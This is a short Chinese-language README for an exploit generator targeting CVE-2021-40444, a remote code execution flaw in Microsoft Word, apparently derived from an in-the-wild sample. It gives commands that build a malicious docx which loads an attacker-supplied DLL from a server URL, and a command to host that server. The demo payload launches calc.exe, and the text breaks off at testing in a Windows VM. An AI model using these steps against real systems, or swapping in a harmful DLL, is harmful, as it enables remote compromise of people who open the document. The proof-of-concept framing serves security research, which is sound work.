恶意 docx 生成器,用于利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)
此脚本的创建基于对野外样本的部分逆向工程:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)
你需要先安装 lcab(sudo apt-get install lcab)
查看 REPRODUCE.md 了解手动复现步骤
如果生成的 cab 文件无法正常工作,请尝试将 exploit.html 的 URL 指向 calc.cab
首先,根据给定的 DLL 生成一个恶意 docx 文档。你可以使用 test/calc.dll 中的 DLL,它会通过调用 system() 弹出一个 calc.exe
python3 exploit.py generate test/calc.dll http://<SRV IP>

生成恶意 docx(将位于 out/ 目录下)后,你可以设置服务器:
sudo python3 exploit.py host 80

最后,在 Windows 虚拟机中尝试该 docx:
